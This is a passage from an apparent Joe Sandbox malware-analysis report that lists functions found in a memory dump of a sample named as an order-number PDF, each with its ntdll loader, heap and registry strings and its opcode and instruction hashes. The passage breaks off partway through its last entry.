                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H/X3$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-2955536759
                                              • Opcode ID: 9fd2cd28bde6df5f5a7d824552fb4efd6ac0cf33ebf40801d5169f2947e4ae3b
                                              • Instruction ID: 68889cbbb17b33051285c1e30c36126643f60fd0a5a8016a82a7be28ada45754
                                              • Opcode Fuzzy Hash: 9fd2cd28bde6df5f5a7d824552fb4efd6ac0cf33ebf40801d5169f2947e4ae3b
                                              • Instruction Fuzzy Hash: CAF15E76E11259EFDB02CFA8E980ADEBBF9FF48650F55045AE401EB610DB709E01CB90
                                              Function 3357B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-122214566
                                              • Opcode ID: 385722e59c313537201e009eda60a9d9316ef4966db8ba190374bac67f269932
                                              • Instruction ID: 187cb91a58b3e1cc61c4de7af652e1d81bf2a1675db65f76a143cc7ed155b978
                                              • Opcode Fuzzy Hash: 385722e59c313537201e009eda60a9d9316ef4966db8ba190374bac67f269932
                                              • Instruction Fuzzy Hash: 95C17B71E01355ABEB148F64FC80BBE7BB6AF85314F5840A9E841DB690DBB4CD84C791
                                              Function 33570770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-4253913091
                                              • Opcode ID: 6bbcb6fe248a00cac0ada543e791b33a418f0cc99457c7e33a5258d60f151710
                                              • Instruction ID: 036dc7db860b203efbd06dd1ab7630705a70d29e98d29db803d02347b5a555e3
                                              • Opcode Fuzzy Hash: 6bbcb6fe248a00cac0ada543e791b33a418f0cc99457c7e33a5258d60f151710
                                              • Instruction Fuzzy Hash: 26F1DE75A00745DFEB05CFA9E884B6AB7F5FF44304F1489A8E4469B781DB38E981CB90
                                              Function 3358F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                              Download Yara Rule
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 335D031E
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 335D02E7
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 335D02BD
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              • Opcode ID: 6ea059e82381754d6c59e3a91b49abce6f5c2edfb15cc7023df0871703622a1b
                                              • Instruction ID: f84774723c5336556f49ea85deb720d2f65f981bb7bd77032134e9f9404a9281
                                              • Opcode Fuzzy Hash: 6ea059e82381754d6c59e3a91b49abce6f5c2edfb15cc7023df0871703622a1b
                                              • Instruction Fuzzy Hash: A3E1BC756087419FE711CF28E880B1AB7E0BB88364F540B2DF5A5CB6E1DB78D845CB92
                                              Function 3363B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 2368cf6eccebba7f76a0300894cc6fabcd85ac988256124b1c77af2ed025972b
                                              • Instruction ID: 00e06989b26155455f1f28e763c47a15990f94931e7180f6db171822748b8a66
                                              • Opcode Fuzzy Hash: 2368cf6eccebba7f76a0300894cc6fabcd85ac988256124b1c77af2ed025972b
                                              • Instruction Fuzzy Hash: 74F13876E002258FDB08CF69C99067EFBF5EF89320759426DD496DB391E634EA01CB90
                                              Function 336111A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: This is located in the %s field of the heap header.$ -U3`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                              • API String ID: 0-4160333617
                                              • Opcode ID: 305877ea78cd7d57fe78dcb5482a3a5d5ae4c8eeb93281579b6f43a444658599
                                              • Instruction ID: ba9e6de9ea458e316f345f5eadb3338a3be0fa1f89856da7703decbb323cd34d
                                              • Opcode Fuzzy Hash: 305877ea78cd7d57fe78dcb5482a3a5d5ae4c8eeb93281579b6f43a444658599
                                              • Instruction Fuzzy Hash: 70313531A01204EFE701DBA8D885F9AB3F8EF467A0F540096F442DB691DB70ED91CB69
                                              Function 335576B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                              • API String ID: 0-3061284088
                                              • Opcode ID: 2f7d14d05e42c2fd145f9fb8c36c2e607141e17419b9c4779de861ea4c725337
                                              • Instruction ID: 721cd88af9d1b7a89863d7a485dee51097d12a14f1e8117fe537111f4b692167
                                              • Opcode Fuzzy Hash: 2f7d14d05e42c2fd145f9fb8c36c2e607141e17419b9c4779de861ea4c725337
                                              • Instruction Fuzzy Hash: A001F73641B688EFF3169719F40DFA677F4DF83670F68409AF01147A52CBE4A884C960
                                              Function 335770C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 72a226c1218b8f7e91ce55af36f520bef8ca944f04e2aaff1f07780ffee77620
                                              • Instruction ID: 01f170024c762800600c75813a6bef37743a4292ad5c0f4b058211cb79212e90
                                              • Opcode Fuzzy Hash: 72a226c1218b8f7e91ce55af36f520bef8ca944f04e2aaff1f07780ffee77620
                                              • Instruction Fuzzy Hash: 4613C074A00355DFEB14CF68E8807A9BBF1FF49304F5885A9E899AB381D734A945CF90
                                              Function 3356B6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\US3
                                              • API String ID: 0-4212131675
                                              • Opcode ID: d6da809052c8403be3f29ffebd62307b184a5e15612f87ce399dc9422ec6fec1
                                              • Instruction ID: 8ed494e8f39611ec2fa504051d63c48656889a82e3927f759c4f6d10a96d79ce
                                              • Opcode Fuzzy Hash: d6da809052c8403be3f29ffebd62307b184a5e15612f87ce399dc9422ec6fec1
                                              • Instruction Fuzzy Hash: A3B1BF76A057888FEB15CF99E880B9DB7B5BF94358F184929E851EB784D734E840CB40
                                              Function 3356B440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\US3${
                                              • API String ID: 0-3654656869
                                              • Opcode ID: ea4de0917977be58475ec6e0677f667fc6b1650165ed2cd375f1fe9fe1ef7fc1
                                              • Instruction ID: e2881be04ab70ea1436c52ad5c6946bd147c7fb51a7dc1791838b0f68fc1968e
                                              • Opcode Fuzzy Hash: ea4de0917977be58475ec6e0677f667fc6b1650165ed2cd375f1fe9fe1ef7fc1
                                              • Instruction Fuzzy Hash: BF91EDB5A01349CFEF21CF95E490BDE77B0FF11368F185595E850AB290EB789A80CB90
                                              Function 3355F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                              • API String ID: 0-2586055223
                                              • Opcode ID: 74ab41065c83965202005f1dd2dafd62d21973dc451de0592b0e5516d85db9ce
                                              • Instruction ID: 9793b6a08ee15a181102fc2cc8c16529ce698a50bbb57539d9a05faaa03d95b3
                                              • Opcode Fuzzy Hash: 74ab41065c83965202005f1dd2dafd62d21973dc451de0592b0e5516d85db9ce
                                              • Instruction Fuzzy Hash: 1061FE76645780AFE712CA24F844F5B77F8EF80750F080969F9958B6A1DB34E841CBA2
                                              Function 33559148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                              • API String ID: 0-1391187441
                                              • Opcode ID: da2ee06c565ca2d31dee483abc61484cb8591303e48b66bb5c4eab8578a90be7
                                              • Instruction ID: 07f74fc76ab1e011e4ef4917712567d001e3da242f3be10379b2cadf5f94cfd3
                                              • Opcode Fuzzy Hash: da2ee06c565ca2d31dee483abc61484cb8591303e48b66bb5c4eab8578a90be7
                                              • Instruction Fuzzy Hash: 0331B476A01258EFEB01CB45EC88F9EB7B8EF45760F544452F815A7291D7B4E940CA60
                                              Function 335A1270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$BuildLabEx$EY3$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 0-1376963708
                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction ID: 76ab05d5050f6beb039a81407ce0fc43ebf05f838561139f9abfd42f3e9a5724
                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction Fuzzy Hash: 2F316F72D0061DAFDB12DF99EC40EDEBBBDEF84760F404426E914A7560D730DA05ABA0
                                              Function 33567152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: fd8cbaab0761a44020958d1841eee4df808e1b02666087602a1e7fb9b43c28aa
                                              • Instruction ID: 63053b93e700b66320fc0a48be8be863470bd0bfcfc73d3620c8565404bfc501
                                              • Opcode Fuzzy Hash: fd8cbaab0761a44020958d1841eee4df808e1b02666087602a1e7fb9b43c28aa
                                              • Instruction Fuzzy Hash: 5251DE35A00746EFEB05CBA4E944BADBBF8BF44369F14406AE45297690EB749A01CB90
                                              Function 335F3A78 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                              • API String ID: 0-1168191160
                                              • Opcode ID: bb523b9b0041edb48eef35ed71305ddb5485eb8b87ffd7df567198f2432baede
                                              • Instruction ID: 011b5d010f02617c5f74cb4a1320e8f9d6f64fc0152d2d4fb29923fb0dbd325d
                                              • Opcode Fuzzy Hash: bb523b9b0041edb48eef35ed71305ddb5485eb8b87ffd7df567198f2432baede
                                              • Instruction Fuzzy Hash: 43F180B5A00328CBEB20CF14EC90BD9B7B5EF54754F8580E9DA09A7240EB369E85CF55
                                              Function 33561460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                              Download Yara Rule
                                              Strings
                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33561728
                                              • HEAP: , xrefs: 33561596
                                              • HEAP[%wZ]: , xrefs: 33561712
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 9ce87c5fa04ad56c998213159bbb874f9619c2cf8968514b56b943c10c0af853
                                              • Instruction ID: bf315e9024a9b2de32889374f324bf46b4eb68b30a8e4ad2fa591d9a15cb2083
                                              • Opcode Fuzzy Hash: 9ce87c5fa04ad56c998213159bbb874f9619c2cf8968514b56b943c10c0af853
                                              • Instruction Fuzzy Hash: 30E11174A043419FEB15CF68D451B7ABBF5AF84308F18895DE4D6CB645DB34EA40CB90
                                              Function 335E368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                              • API String ID: 0-2391371766
                                              • Opcode ID: 1c420a9a8692de36ac8d99aff38b71dc512514117f194bf96744f05ab8de24cf
                                              • Instruction ID: 9fc68cd1f7c51a8dbc49c4af43a56ff92225531697836aef6b69090c051bba99
                                              • Opcode Fuzzy Hash: 1c420a9a8692de36ac8d99aff38b71dc512514117f194bf96744f05ab8de24cf
                                              • Instruction Fuzzy Hash: 8FB1BEB1A04341AFE311DF54E880B9BB7F8FB94754F812929FA80EB650D771E944CB92
                                              Function 33603B60 Relevance: 4.0, Strings: 3, Instructions: 280COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                              • API String ID: 0-1146358195
                                              • Opcode ID: 0990278453d3e512855e190487dc0ee250512bef7682734fa3d8f0d42e842d4f
                                              • Instruction ID: 4abd45c64938f52fa971c73e360b41216e15f35a19ce9a560aebdb95fd6e4ef4
                                              • Opcode Fuzzy Hash: 0990278453d3e512855e190487dc0ee250512bef7682734fa3d8f0d42e842d4f
                                              • Instruction Fuzzy Hash: D3A17971A083519FE315CF24D981A1BBBE8FFC8B94F900A2EB98497650DB70DD04CB92
                                              Function 335F36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                              • API String ID: 0-318774311
                                              • Opcode ID: 73508481734fca17ece5ae5da71ca27e8995728f9671d49f7abfdc8873f56d9c
                                              • Instruction ID: 48dd3738621340dec2372d73355c34537946fbc8b086f5ef18e8c671ea717ef3
                                              • Opcode Fuzzy Hash: 73508481734fca17ece5ae5da71ca27e8995728f9671d49f7abfdc8873f56d9c
                                              • Instruction Fuzzy Hash: 9C818CB5609340EFE311CF24E841F6AB7E8EF94790F440969F9909B790DB75D904CBA2
                                              Function 335E7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                              • API String ID: 0-3870751728
                                              • Opcode ID: da644d1a7ab4913ba8910ab658aba39f6b2f87a9306a2e33424af91dd67c731a
                                              • Instruction ID: 926250b2d9076c6e8cc5b73db45119641c2bdfa9e4f39fee917a1f3acdd26987
                                              • Opcode Fuzzy Hash: da644d1a7ab4913ba8910ab658aba39f6b2f87a9306a2e33424af91dd67c731a
                                              • Instruction Fuzzy Hash: F19149B4E003159FEB14CFA8E480BDDBBB1FF88354F14816AE915AB291E7759842CF94
                                              Function 3359909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$&$@
                                              • API String ID: 0-1537733988
                                              • Opcode ID: a8f0220327277a6c3b64e6b790bd00ce91a1c51ca636c07aa53e35cf7f636ba9
                                              • Instruction ID: 55432bcd0acf054fe28ab25fa2a5b7bf57ddd3b3e11af2a43e3293944143775a
                                              • Opcode Fuzzy Hash: a8f0220327277a6c3b64e6b790bd00ce91a1c51ca636c07aa53e35cf7f636ba9
                                              • Instruction Fuzzy Hash: 3771D074A083819FF700CF24E580A8BBBE9BFC8758F544D1DE49A9B650D731D909CB92
                                              Function 3363B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                              Download Yara Rule
                                              Strings
                                              • GlobalizationUserSettings, xrefs: 3363B834
                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3363B82A
                                              • TargetNtPath, xrefs: 3363B82F
                                              Memory Dump Source
